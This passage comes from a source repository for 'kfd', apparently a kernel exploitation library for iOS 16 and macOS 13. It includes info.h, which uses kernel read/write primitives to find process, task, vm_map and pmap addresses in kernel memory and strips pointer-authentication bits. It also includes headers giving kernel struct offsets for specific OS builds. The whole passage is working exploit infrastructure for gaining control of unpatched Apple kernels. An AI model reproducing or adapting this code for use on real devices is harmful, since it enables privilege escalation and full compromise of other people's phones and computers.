field) (offsetof(struct object, field)) 59 | 60 | #define static_uget(object, field, object_uaddr) (((volatile struct object*)(object_uaddr))->field) 61 | 62 | #define static_uset(object, field, object_uaddr, field_value) \ 63 | do { \ 64 | (((volatile struct object*)(object_uaddr))->field = (field_value)); \ 65 | } while (0) 66 | 67 | #define static_kget(object, field_type, field, object_kaddr) \ 68 | ({ \ 69 | u64 buffer = 0; \ 70 | u64 field_kaddr = (u64)(object_kaddr) + static_offsetof(object, field); \ 71 | kread((u64)(kfd), (field_kaddr), (&buffer), (sizeof(buffer))); \ 72 | field_type field_value = *(field_type*)(&buffer); \ 73 | field_value; \ 74 | }) 75 | 76 | #define static_kset_u64(object, field, object_kaddr, field_value) \ 77 | do { \ 78 | u64 buffer = field_value; \ 79 | u64 field_kaddr = (u64)(object_kaddr) + static_offsetof(object, field); \ 80 | kwrite((u64)(kfd), (&buffer), (field_kaddr), (sizeof(buffer))); \ 81 | } while (0) 82 | 83 | #include "info/static_types/fileglob.h" 84 | #include "info/static_types/fileops.h" 85 | #include "info/static_types/fileproc_guard.h" 86 | #include "info/static_types/fileproc.h" 87 | #include "info/static_types/ipc_entry.h" 88 | #include "info/static_types/ipc_port.h" 89 | #include "info/static_types/ipc_space.h" 90 | #include "info/static_types/miscellaneous_types.h" 91 | #include "info/static_types/pmap.h" 92 | #include "info/static_types/pseminfo.h" 93 | #include "info/static_types/psemnode.h" 94 | #include "info/static_types/semaphore.h" 95 | #include "info/static_types/vm_map_copy.h" 96 | #include "info/static_types/vm_map_entry.h" 97 | #include "info/static_types/vm_named_entry.h" 98 | #include "info/static_types/vm_object.h" 99 | #include "info/static_types/vm_page.h" 100 | 101 | const u64 ios_16_0_a = 0x0000373533413032; // 20A357 102 | const u64 ios_16_0_b = 0x0000323633413032; // 20A362 103 | const u64 ios_16_0_1 = 0x0000313733413032; // 20A371 104 | const u64 ios_16_0_2 = 0x0000303833413032; // 20A380 105 | const u64 ios_16_0_3 = 0x0000323933413032; // 20A392 106 | const u64 ios_16_1 = 0x0000003238423032; // 20B82 107 | const u64 ios_16_1_1 = 0x0000313031423032; // 20B101 108 | const u64 ios_16_1_2 = 0x0000303131423032; // 20B110 109 | const u64 ios_16_2 = 0x0000003536433032; // 20C65 110 | const u64 ios_16_3 = 0x0000003734443032; // 20D47 111 | const u64 ios_16_3_1 = 0x0000003736443032; // 20D67 112 | const u64 ios_16_4 = 0x0000373432453032; // 20E247 113 | const u64 ios_16_4_1 = 0x0000323532453032; // 20E252 114 | const u64 ios_16_5 = 0x0000003636463032; // 20F66 115 | const u64 ios_16_5_1 = 0x0000003537463032; // 20F75 116 | 117 | const u64 macos_13_0 = 0x0000303833413232; // 22A380 118 | const u64 macos_13_0_1 = 0x0000303034413232; // 22A400 119 | const u64 macos_13_1 = 0x0000003536433232; // 22C65 120 | const u64 macos_13_2 = 0x0000003934443232; // 22D49 121 | const u64 macos_13_2_1 = 0x0000003836443232; // 22D68 122 | const u64 macos_13_3 = 0x0000323532453232; // 22E252 123 | const u64 macos_13_3_1 = 0x0000313632453232; // 22E261 124 | const u64 macos_13_4 = 0x0000003636463232; // 22F66 125 | 126 | #define t1sz_boot (17ull) 127 | #define ptr_mask ((1ull << (64ull - t1sz_boot)) - 1ull) 128 | #define pac_mask (~ptr_mask) 129 | #define unsign_kaddr(kaddr) ((kaddr) | (pac_mask)) 130 | 131 | const char copy_sentinel[16] = "p0up0u was here"; 132 | const u64 copy_sentinel_size = sizeof(copy_sentinel); 133 | 134 | void info_init(struct kfd* kfd) 135 | { 136 | /* 137 | * Initialize the "kfd->info.copy" substructure. 138 | * 139 | * Note that the vm_copy() in krkw_helper_grab_free_pages() makes the following assumptions: 140 | * - The copy size is strictly greater than "msg_ool_size_small". 141 | * - The src vm_object must have a copy_strategy of MEMORY_OBJECT_COPY_NONE. 142 | * - The dst vm_object must have a copy_strategy of MEMORY_OBJECT_COPY_SYMMETRIC. 143 | */ 144 | const u64 msg_ool_size_small = (32 * 1024); 145 | kfd->info.copy.size = pages(4); 146 | assert(kfd->info.copy.size > msg_ool_size_small); 147 | 148 | assert_mach(vm_allocate(mach_task_self(), &kfd->info.copy.src_uaddr, kfd->info.copy.size, VM_FLAGS_ANYWHERE | VM_FLAGS_PURGABLE)); 149 | assert_mach(vm_allocate(mach_task_self(), &kfd->info.copy.dst_uaddr, kfd->info.copy.size, VM_FLAGS_ANYWHERE)); 150 | for (u64 offset = pages(0); offset < kfd->info.copy.size; offset += pages(1)) { 151 | bcopy(copy_sentinel, (void*)(kfd->info.copy.src_uaddr + offset), copy_sentinel_size); 152 | bcopy(copy_sentinel, (void*)(kfd->info.copy.dst_uaddr + offset), copy_sentinel_size); 153 | } 154 | 155 | /* 156 | * Initialize the "kfd->info.env" substructure. 157 | * 158 | * Note that: 159 | * - We boost the file descriptor limit to "maxfilesperproc". 160 | * - We use the "vid" as a version index to get the offsets and sizes for dynamic types. 161 | */ 162 | kfd->info.env.pid = getpid(); 163 | 164 | thread_identifier_info_data_t data = {}; 165 | thread_info_t info = (thread_info_t)(&data); 166 | mach_msg_type_number_t count = THREAD_IDENTIFIER_INFO_COUNT; 167 | assert_mach(thread_info(mach_thread_self(), THREAD_IDENTIFIER_INFO, info, &count)); 168 | kfd->info.env.tid = data.thread_id; 169 | 170 | usize size1 = sizeof(kfd->info.env.maxfilesperproc); 171 | assert_bsd(sysctlbyname("kern.maxfilesperproc", &kfd->info.env.maxfilesperproc, &size1, NULL, 0)); 172 | 173 | struct rlimit rlim = { 174 | .rlim_cur = kfd->info.env.maxfilesperproc, 175 | .rlim_max = kfd->info.env.maxfilesperproc 176 | }; 177 | assert_bsd(setrlimit(RLIMIT_NOFILE, &rlim)); 178 | 179 | usize size2 = sizeof(kfd->info.env.osversion); 180 | assert_bsd(sysctlbyname("kern.osversion", &kfd->info.env.osversion, &size2, NULL, 0)); 181 | 182 | switch (*(u64*)(&kfd->info.env.osversion)) { 183 | case ios_16_3: 184 | case ios_16_3_1: { 185 | kfd->info.env.vid = 0; 186 | kfd->info.env.ios = true; 187 | break; 188 | } 189 | case ios_16_4: 190 | case ios_16_5: 191 | case ios_16_5_1: { 192 | kfd->info.env.vid = 1; 193 | kfd->info.env.ios = true; 194 | break; 195 | } 196 | case macos_13_1: { 197 | kfd->info.env.vid = 2; 198 | kfd->info.env.ios = false; 199 | break; 200 | } 201 | case macos_13_4: { 202 | kfd->info.env.vid = 3; 203 | kfd->info.env.ios = false; 204 | break; 205 | } 206 | default: { 207 | assert_false("unsupported osversion"); 208 | } 209 | } 210 | 211 | print_i32(kfd->info.env.pid); 212 | print_u64(kfd->info.env.tid); 213 | print_u64(kfd->info.env.vid); 214 | print_bool(kfd->info.env.ios); 215 | print_string(kfd->info.env.osversion); 216 | print_u64(kfd->info.env.maxfilesperproc); 217 | } 218 | 219 | void info_run(struct kfd* kfd) 220 | { 221 | timer_start(); 222 | 223 | /* 224 | * current_proc() and current_task() 225 | */ 226 | assert(kfd->info.kaddr.current_proc); 227 | kfd->info.kaddr.current_task = kfd->info.kaddr.current_proc + dynamic_sizeof(proc); 228 | print_x64(kfd->info.kaddr.current_proc); 229 | print_x64(kfd->info.kaddr.current_task); 230 | 231 | /* 232 | * current_map() 233 | */ 234 | u64 signed_map_kaddr = dynamic_kget(task, map, kfd->info.kaddr.current_task); 235 | kfd->info.kaddr.current_map = unsign_kaddr(signed_map_kaddr); 236 | print_x64(kfd->info.kaddr.current_map); 237 | 238 | /* 239 | * current_pmap() 240 | */ 241 | u64 signed_pmap_kaddr = dynamic_kget(vm_map, pmap, kfd->info.kaddr.current_map); 242 | kfd->info.kaddr.current_pmap = unsign_kaddr(signed_pmap_kaddr); 243 | print_x64(kfd->info.kaddr.current_pmap); 244 | 245 | /* 246 | * current_thread() and current_uthread() 247 | */ 248 | const bool find_current_thread = false; 249 | 250 | if (find_current_thread) { 251 | u64 thread_kaddr = dynamic_kget(task, threads_next, kfd->info.kaddr.current_task); 252 | 253 | while (true) { 254 | u64 tid = dynamic_kget(thread, thread_id, thread_kaddr); 255 | if (tid == kfd->info.env.tid) { 256 | kfd->info.kaddr.current_thread = thread_kaddr; 257 | kfd->info.kaddr.current_uthread = thread_kaddr + dynamic_sizeof(thread); 258 | break; 259 | } 260 | 261 | thread_kaddr = dynamic_kget(thread, task_threads_next, thread_kaddr); 262 | } 263 | 264 | print_x64(kfd->info.kaddr.current_thread); 265 | print_x64(kfd->info.kaddr.current_uthread); 266 | } 267 | 268 | if (kfd->info.kaddr.kernel_proc) { 269 | /* 270 | * kernel_proc() and kernel_task() 271 | */ 272 | kfd->info.kaddr.kernel_task = kfd->info.kaddr.kernel_proc + dynamic_sizeof(proc); 273 | print_x64(kfd->info.kaddr.kernel_proc); 274 | print_x64(kfd->info.kaddr.kernel_task); 275 | 276 | /* 277 | * kernel_map() 278 | */ 279 | u64 signed_map_kaddr = dynamic_kget(task, map, kfd->info.kaddr.kernel_task); 280 | kfd->info.kaddr.kernel_map = unsign_kaddr(signed_map_kaddr); 281 | print_x64(kfd->info.kaddr.kernel_map); 282 | 283 | /* 284 | * kernel_pmap() 285 | */ 286 | u64 signed_pmap_kaddr = dynamic_kget(vm_map, pmap, kfd->info.kaddr.kernel_map); 287 | kfd->info.kaddr.kernel_pmap = unsign_kaddr(signed_pmap_kaddr); 288 | print_x64(kfd->info.kaddr.kernel_pmap); 289 | } 290 | 291 | timer_end(); 292 | } 293 | 294 | void info_free(struct kfd* kfd) 295 | { 296 | assert_mach(vm_deallocate(mach_task_self(), kfd->info.copy.src_uaddr, kfd->info.copy.size)); 297 | assert_mach(vm_deallocate(mach_task_self(), kfd->info.copy.dst_uaddr, kfd->info.copy.size)); 298 | } 299 | 300 | #endif /* info_h */ 301 | -------------------------------------------------------------------------------- /kfd/libkfd/info/dynamic_types/kqworkloop.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef kqworkloop_h 6 | #define kqworkloop_h 7 | 8 | struct kqworkloop { 9 | u64 kqwl_state; 10 | u64 kqwl_p; 11 | u64 kqwl_owner; 12 | u64 kqwl_dynamicid; 13 | u64 object_size; 14 | }; 15 | 16 | const struct kqworkloop kqworkloop_versions[] = { 17 | { .kqwl_state = 0x10, .kqwl_p = 0x18, .kqwl_owner = 0xd0, .kqwl_dynamicid = 0xe8, .object_size = 0x108 }, 18 | { .kqwl_state = 0x10, .kqwl_p = 0x18, .kqwl_owner = 0xd0, .kqwl_dynamicid = 0xe8, .object_size = 0x108 }, 19 | { .kqwl_state = 0x10, .kqwl_p = 0x18, .kqwl_owner = 0xd0, .kqwl_dynamicid = 0xe8, .object_size = 0x108 }, 20 | { .kqwl_state = 0x10, .kqwl_p = 0x18, .kqwl_owner = 0xd0, .kqwl_dynamicid = 0xe8, .object_size = 0x108 }, 21 | }; 22 | 23 | typedef u16 kqworkloop_kqwl_state_t; 24 | typedef u64 kqworkloop_kqwl_p_t; 25 | typedef u64 kqworkloop_kqwl_owner_t; 26 | typedef u64 kqworkloop_kqwl_dynamicid_t; 27 | 28 | #endif /* kqworkloop_h */ 29 | -------------------------------------------------------------------------------- /kfd/libkfd/info/dynamic_types/proc.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef proc_h 6 | #define proc_h 7 | 8 | struct proc { 9 | u64 p_list_le_next; 10 | u64 p_list_le_prev; 11 | u64 p_pid; 12 | u64 p_fd_fd_ofiles; 13 | u64 object_size; 14 | }; 15 | 16 | const struct proc proc_versions[] = { 17 | { .p_list_le_next = 0x0, .p_list_le_prev = 0x8, .p_pid = 0x60, .p_fd_fd_ofiles = 0xf8, .object_size = 0x538 }, 18 | { .p_list_le_next = 0x0, .p_list_le_prev = 0x8, .p_pid = 0x60, .p_fd_fd_ofiles = 0xf8, .object_size = 0x730 }, 19 | { .p_list_le_next = 0x0, .p_list_le_prev = 0x8, .p_pid = 0x60, .p_fd_fd_ofiles = 0xf8, .object_size = 0x580 }, 20 | { .p_list_le_next = 0x0, .p_list_le_prev = 0x8, .p_pid = 0x60, .p_fd_fd_ofiles = 0xf8, .object_size = 0x778 }, 21 | }; 22 | 23 | typedef u64 proc_p_list_le_next_t; 24 | typedef u64 proc_p_list_le_prev_t; 25 | typedef i32 proc_p_pid_t; 26 | typedef u64 proc_p_fd_fd_ofiles_t; 27 | 28 | #endif /* proc_h */ 29 | -------------------------------------------------------------------------------- /kfd/libkfd/info/dynamic_types/task.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef task_h 6 | #define task_h 7 | 8 | struct task { 9 | u64 map; 10 | u64 threads_next; 11 | u64 threads_prev; 12 | u64 itk_space; 13 | u64 object_size; 14 | }; 15 | 16 | const struct task task_versions[] = { 17 | { .map = 0x28, .threads_next = 0x58, .threads_prev = 0x60, .itk_space = 0x300, .object_size = 0x648 }, 18 | { .map = 0x28, .threads_next = 0x58, .threads_prev = 0x60, .itk_space = 0x300, .object_size = 0x640 }, 19 | { .map = 0x28, .threads_next = 0x58, .threads_prev = 0x60, .itk_space = 0x300, .object_size = 0x658 }, 20 | { .map = 0x28, .threads_next = 0x58, .threads_prev = 0x60, .itk_space = 0x300, .object_size = 0x658 }, 21 | }; 22 | 23 | typedef u64 task_map_t; 24 | typedef u64 task_threads_next_t; 25 | typedef u64 task_threads_prev_t; 26 | typedef u64 task_itk_space_t; 27 | 28 | #endif /* task_h */ 29 | -------------------------------------------------------------------------------- /kfd/libkfd/info/dynamic_types/thread.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef thread_h 6 | #define thread_h 7 | 8 | struct thread { 9 | u64 task_threads_next; 10 | u64 task_threads_prev; 11 | u64 map; 12 | u64 thread_id; 13 | u64 object_size; 14 | }; 15 | 16 | const struct thread thread_versions[] = { 17 | { .task_threads_next = 0x368, .task_threads_prev = 0x370, .map = 0x380, .thread_id = 0x420, .object_size = 0x4c8 }, 18 | { .task_threads_next = 0x368, .task_threads_prev = 0x370, .map = 0x380, .thread_id = 0x418, .object_size = 0x4c0 }, 19 | { .task_threads_next = 0x3c0, .task_threads_prev = 0x3c8, .map = 0x3d8, .thread_id = 0x490, .object_size = 0x650 }, 20 | { .task_threads_next = 0x3c0, .task_threads_prev = 0x3c8, .map = 0x3d8, .thread_id = 0x490, .object_size = 0x650 }, 21 | }; 22 | 23 | typedef u64 thread_task_threads_next_t; 24 | typedef u64 thread_task_threads_prev_t; 25 | typedef u64 thread_map_t; 26 | typedef u64 thread_thread_id_t; 27 | 28 | #endif /* thread_h */ 29 | -------------------------------------------------------------------------------- /kfd/libkfd/info/dynamic_types/uthread.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef uthread_h 6 | #define uthread_h 7 | 8 | struct uthread { 9 | u64 object_size; 10 | }; 11 | 12 | const struct uthread uthread_versions[] = { 13 | { .object_size = 0x200 }, 14 | { .object_size = 0x200 }, 15 | { .object_size = 0x1b0 }, 16 | { .object_size = 0x1b0 }, 17 | }; 18 | 19 | #endif /* uthread_h */ 20 | -------------------------------------------------------------------------------- /kfd/libkfd/info/dynamic_types/vm_map.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef vm_map_h 6 | #define vm_map_h 7 | 8 | #include "../static_types/vm_map_copy.h" 9 | 10 | struct vm_map { 11 | u64 hdr_links_prev; 12 | u64 hdr_links_next; 13 | u64 min_offset; 14 | u64 max_offset; 15 | u64 hdr_nentries; 16 | u64 hdr_nentries_u64; 17 | u64 hdr_rb_head_store_rbh_root; 18 | u64 pmap; 19 | u64 hint; 20 | u64 hole_hint; 21 | u64 holes_list; 22 | u64 object_size; 23 | }; 24 | 25 | const struct vm_map vm_map_versions[] = { 26 | { 27 | .hdr_links_prev = 0x10, 28 | .hdr_links_next = 0x18, 29 | .min_offset = 0x20, 30 | .max_offset = 0x28, 31 | .hdr_nentries = 0x30, 32 | .hdr_nentries_u64 = 0x30, 33 | .hdr_rb_head_store_rbh_root = 0x38, 34 | .pmap = 0x40, 35 | .hint = 0x98, 36 | .hole_hint = 0xa0, 37 | .holes_list = 0xa8, 38 | .object_size = 0xc0, 39 | }, 40 | { 41 | .hdr_links_prev = 0x10, 42 | .hdr_links_next = 0x18, 43 | .min_offset = 0x20, 44 | .max_offset = 0x28, 45 | .hdr_nentries = 0x30, 46 | .hdr_nentries_u64 = 0x30, 47 | .hdr_rb_head_store_rbh_root = 0x38, 48 | .pmap = 0x40, 49 | .hint = 0x98, 50 | .hole_hint = 0xa0, 51 | .holes_list = 0xa8, 52 | .object_size = 0xc0, 53 | }, 54 | { 55 | .hdr_links_prev = 0x10, 56 | .hdr_links_next = 0x18, 57 | .min_offset = 0x20, 58 | .max_offset = 0x28, 59 | .hdr_nentries = 0x30, 60 | .hdr_nentries_u64 = 0x30, 61 | .hdr_rb_head_store_rbh_root = 0x38, 62 | .pmap = 0x40, 63 | .hint = 0x80, 64 | .hole_hint = 0x88, 65 | .holes_list = 0x90, 66 | .object_size = 0xa8, 67 | }, 68 | { 69 | .hdr_links_prev = 0x10, 70 | .hdr_links_next = 0x18, 71 | .min_offset = 0x20, 72 | .max_offset = 0x28, 73 | .hdr_nentries = 0x30, 74 | .hdr_nentries_u64 = 0x30, 75 | .hdr_rb_head_store_rbh_root = 0x38, 76 | .pmap = 0x40, 77 | .hint = 0x80, 78 | .hole_hint = 0x88, 79 | .holes_list = 0x90, 80 | .object_size = 0xa8, 81 | }, 82 | }; 83 | 84 | typedef u64 vm_map_hdr_links_prev_t; 85 | typedef u64 vm_map_hdr_links_next_t; 86 | typedef u64 vm_map_min_offset_t; 87 | typedef u64 vm_map_max_offset_t; 88 | typedef i32 vm_map_hdr_nentries_t; 89 | typedef u64 vm_map_hdr_nentries_u64_t; 90 | typedef u64 vm_map_hdr_rb_head_store_rbh_root_t; 91 | typedef u64 vm_map_pmap_t; 92 | typedef u64 vm_map_hint_t; 93 | typedef u64 vm_map_hole_hint_t; 94 | typedef u64 vm_map_holes_list_t; 95 | 96 | struct _vm_map { 97 | u64 lock[2]; 98 | struct vm_map_header hdr; 99 | u64 pmap; 100 | u64 size; 101 | u64 size_limit; 102 | u64 data_limit; 103 | u64 user_wire_limit; 104 | u64 user_wire_size; 105 | #if TARGET_MACOS 106 | u64 vmmap_high_start; 107 | #else /* TARGET_MACOS */ 108 | u64 user_range[4]; 109 | #endif /* TARGET_MACOS */ 110 | union { 111 | u64 vmu1_highest_entry_end; 112 | u64 vmu1_lowest_unnestable_start; 113 | } vmu1; 114 | u64 hint; 115 | union { 116 | u64 vmmap_hole_hint; 117 | u64 vmmap_corpse_footprint; 118 | } vmmap_u_1; 119 | union { 120 | u64 _first_free; 121 | u64 _holes; 122 | } f_s; 123 | u32 map_refcnt; 124 | u32 125 | wait_for_space:1, 126 | wiring_required:1, 127 | no_zero_fill:1, 128 | mapped_in_other_pmaps:1, 129 | switch_protect:1, 130 | disable_vmentry_reuse:1, 131 | map_disallow_data_exec:1, 132 | holelistenabled:1, 133 | is_nested_map:1, 134 | map_disallow_new_exec:1, 135 | jit_entry_exists:1, 136 | has_corpse_footprint:1, 137 | terminated:1, 138 | is_alien:1, 139 | cs_enforcement:1, 140 | cs_debugged:1, 141 | reserved_regions:1, 142 | single_jit:1, 143 | never_faults:1, 144 | uses_user_ranges:1, 145 | pad:12; 146 | u32 timestamp; 147 | }; 148 | 149 | void print_vm_map(struct kfd* kfd, struct _vm_map* map, u64 map_kaddr) 150 | { 151 | print_message("struct _vm_map @ %016llx", map_kaddr); 152 | print_x64(map->hdr.links.prev); 153 | print_x64(map->hdr.links.next); 154 | print_x64(map->hdr.links.start); 155 | print_x64(map->hdr.links.end); 156 | print_i32(map->hdr.nentries); 157 | print_u16(map->hdr.page_shift); 158 | print_bool(map->hdr.entries_pageable); 159 | print_x64(map->hdr.rb_head_store.rbh_root); 160 | print_x64(map->pmap); 161 | print_x64(map->size); 162 | print_x64(map->size_limit); 163 | print_x64(map->data_limit); 164 | print_x64(map->user_wire_limit); 165 | print_x64(map->user_wire_size); 166 | print_x64(map->vmu1.vmu1_lowest_unnestable_start); 167 | print_x64(map->hint); 168 | print_x64(map->vmmap_u_1.vmmap_hole_hint); 169 | print_x64(map->f_s._holes); 170 | print_u32(map->map_refcnt); 171 | print_bool(map->wait_for_space); 172 | print_bool(map->wiring_required); 173 | print_bool(map->no_zero_fill); 174 | print_bool(map->mapped_in_other_pmaps); 175 | print_bool(map->switch_protect); 176 | print_bool(map->disable_vmentry_reuse); 177 | print_bool(map->map_disallow_data_exec); 178 | print_bool(map->holelistenabled); 179 | print_bool(map->is_nested_map); 180 | print_bool(map->map_disallow_new_exec); 181 | print_bool(map->jit_entry_exists); 182 | print_bool(map->has_corpse_footprint); 183 | print_bool(map->terminated); 184 | print_bool(map->is_alien); 185 | print_bool(map->cs_enforcement); 186 | print_bool(map->cs_debugged); 187 | print_bool(map->reserved_regions); 188 | print_bool(map->single_jit); 189 | print_bool(map->never_faults); 190 | print_bool(map->uses_user_ranges); 191 | print_u32(map->timestamp); 192 | } 193 | 194 | #endif /* vm_map_h */ 195 | -------------------------------------------------------------------------------- /kfd/libkfd/info/static_types/fileglob.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef fileglob_h 6 | #define fileglob_h 7 | 8 | struct fileglob { 9 | struct { 10 | u64 le_next; 11 | u64 le_prev; 12 | } _msglist; 13 | u32 fg_flag; 14 | u32 fg_count; 15 | u32 fg_msgcount; 16 | i32 fg_lflags; 17 | u64 fg_cred; 18 | u64 fg_ops; 19 | i64 fg_offset; 20 | u64 fg_data; 21 | u64 fg_vn_data; 22 | u64 fg_lock[2]; 23 | }; 24 | 25 | #endif /* fileglob_h */ 26 | -------------------------------------------------------------------------------- /kfd/libkfd/info/static_types/fileops.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | 6 | #ifndef fileops_h 7 | #define fileops_h 8 | 9 | typedef enum { 10 | DTYPE_VNODE = 1, 11 | DTYPE_SOCKET, 12 | DTYPE_PSXSHM, 13 | DTYPE_PSXSEM, 14 | DTYPE_KQUEUE, 15 | DTYPE_PIPE, 16 | DTYPE_FSEVENTS, 17 | DTYPE_ATALK, 18 | DTYPE_NETPOLICY, 19 | DTYPE_CHANNEL, 20 | DTYPE_NEXUS 21 | } file_type_t; 22 | 23 | struct fileops { 24 | file_type_t fo_type; 25 | void* fo_read; 26 | void* fo_write; 27 | void* fo_ioctl; 28 | void* fo_select; 29 | void* fo_close; 30 | void* fo_kqfilter; 31 | void* fo_drain; 32 | }; 33 | 34 | #endif /* fileops_h */ 35 | -------------------------------------------------------------------------------- /kfd/libkfd/info/static_types/fileproc.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef fileproc_h 6 | #define fileproc_h 7 | 8 | struct fileproc { 9 | u32 fp_iocount; 10 | u32 fp_vflags; 11 | u16 fp_flags; 12 | u16 fp_guard_attrs; 13 | u64 fp_glob; 14 | union { 15 | u64 fp_wset; 16 | u64 fp_guard; 17 | }; 18 | }; 19 | 20 | #endif /* fileproc_h */ 21 | -------------------------------------------------------------------------------- /kfd/libkfd/info/static_types/fileproc_guard.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef fileproc_guard_h 6 | #define fileproc_guard_h 7 | 8 | struct fileproc_guard { 9 | u64 fpg_wset; 10 | u64 fpg_guard; 11 | }; 12 | 13 | #endif /* fileproc_guard_h */ 14 | -------------------------------------------------------------------------------- /kfd/libkfd/info/static_types/ipc_entry.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef ipc_entry_h 6 | #define ipc_entry_h 7 | 8 | struct ipc_entry { 9 | union { 10 | u64 ie_object; 11 | u64 ie_volatile_object; 12 | }; 13 | u32 ie_bits; 14 | u32 ie_dist:12; 15 | u32 ie_index:32; 16 | union { 17 | u32 ie_next; 18 | u32 ie_request; 19 | }; 20 | }; 21 | 22 | #endif /* ipc_entry_h */ 23 | -------------------------------------------------------------------------------- /kfd/libkfd/info/static_types/ipc_port.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef ipc_port_h 6 | #define ipc_port_h 7 | 8 | struct ipc_port { 9 | struct { 10 | u32 io_bits; 11 | u32 io_references; 12 | } ip_object; 13 | u64 ip_waitq_and_ip_messages[7]; 14 | union { 15 | u64 ip_receiver; 16 | u64 ip_destination; 17 | u32 ip_timestamp; 18 | }; 19 | union { 20 | u64 ip_kobject; 21 | u64 ip_imp_task; 22 | u64 ip_sync_inheritor_port; 23 | u64 ip_sync_inheritor_knote; 24 | u64 ip_sync_inheritor_ts; 25 | }; 26 | union { 27 | i32 ip_pid; 28 | u64 ip_twe; 29 | u64 ip_pdrequest; 30 | }; 31 | u64 ip_nsrequest; 32 | u64 ip_requests; 33 | union { 34 | u64 ip_premsg; 35 | u64 ip_send_turnstile; 36 | }; 37 | u64 ip_context; 38 | u32 ip_impcount; 39 | u32 ip_mscount; 40 | u32 ip_srights; 41 | u32 ip_sorights; 42 | union { 43 | u64 ip_kolabel; 44 | u64 ip_splabel; 45 | }; 46 | }; 47 | 48 | #endif /* ipc_port_h */ 49 | -------------------------------------------------------------------------------- /kfd/libkfd/info/static_types/ipc_space.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef ipc_space_h 6 | #define ipc_space_h 7 | 8 | struct ipc_space { 9 | u64 is_lock[2]; 10 | u32 is_bits; 11 | u32 is_table_hashed; 12 | u32 is_table_free; 13 | u64 is_table; 14 | u64 is_task; 15 | u64 is_grower; 16 | u64 is_label; 17 | u32 is_low_mod; 18 | u32 is_high_mod; 19 | struct { 20 | u32 seed[4]; 21 | u32 state; 22 | u64 lock[2]; 23 | } bool_gen; 24 | u32 is_entropy[1]; 25 | i32 is_node_id; 26 | }; 27 | 28 | #endif /* ipc_space_h */ 29 | -------------------------------------------------------------------------------- /kfd/libkfd/info/static_types/miscellaneous_types.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef miscellaneous_types_h 6 | #define miscellaneous_types_h 7 | 8 | #define GUARD_REQUIRED (1u << 1) 9 | 10 | /* 11 | * kqueue stuff 12 | */ 13 | 14 | #define KQ_WORKLOOP_CREATE 0x01 15 | #define KQ_WORKLOOP_DESTROY 0x02 16 | 17 | #define KQ_WORKLOOP_CREATE_SCHED_PRI 0x01 18 | #define KQ_WORKLOOP_CREATE_SCHED_POL 0x02 19 | #define KQ_WORKLOOP_CREATE_CPU_PERCENT 0x04 20 | 21 | struct kqueue_workloop_params { 22 | i32 kqwlp_version; 23 | i32 kqwlp_flags; 24 | u64 kqwlp_id; 25 | i32 kqwlp_sched_pri; 26 | i32 kqwlp_sched_pol; 27 | i32 kqwlp_cpu_percent; 28 | i32 kqwlp_cpu_refillms; 29 | } __attribute__((packed)); 30 | 31 | __options_decl(kq_state_t, u16, { 32 | KQ_SLEEP = 0x0002, 33 | KQ_PROCWAIT = 0x0004, 34 | KQ_KEV32 = 0x0008, 35 | KQ_KEV64 = 0x0010, 36 | KQ_KEV_QOS = 0x0020, 37 | KQ_WORKQ = 0x0040, 38 | KQ_WORKLOOP = 0x0080, 39 | KQ_PROCESSING = 0x0100, 40 | KQ_DRAIN = 0x0200, 41 | KQ_DYNAMIC = 0x0800, 42 | KQ_R2K_ARMED = 0x1000, 43 | KQ_HAS_TURNSTILE = 0x2000, 44 | }); 45 | 46 | /* 47 | * proc_info stuff 48 | */ 49 | 50 | #define PROC_INFO_CALL_LISTPIDS 0x1 51 | #define PROC_INFO_CALL_PIDINFO 0x2 52 | #define PROC_INFO_CALL_PIDFDINFO 0x3 53 | #define PROC_INFO_CALL_KERNMSGBUF 0x4 54 | #define PROC_INFO_CALL_SETCONTROL 0x5 55 | #define PROC_INFO_CALL_PIDFILEPORTINFO 0x6 56 | #define PROC_INFO_CALL_TERMINATE 0x7 57 | #define PROC_INFO_CALL_DIRTYCONTROL 0x8 58 | #define PROC_INFO_CALL_PIDRUSAGE 0x9 59 | #define PROC_INFO_CALL_PIDORIGINATORINFO 0xa 60 | #define PROC_INFO_CALL_LISTCOALITIONS 0xb 61 | #define PROC_INFO_CALL_CANUSEFGHW 0xc 62 | #define PROC_INFO_CALL_PIDDYNKQUEUEINFO 0xd 63 | #define PROC_INFO_CALL_UDATA_INFO 0xe 64 | #define PROC_INFO_CALL_SET_DYLD_IMAGES 0xf 65 | #define PROC_INFO_CALL_TERMINATE_RSR 0x10 66 | 67 | struct vinfo_stat { 68 | u32 vst_dev; 69 | u16 vst_mode; 70 | u16 vst_nlink; 71 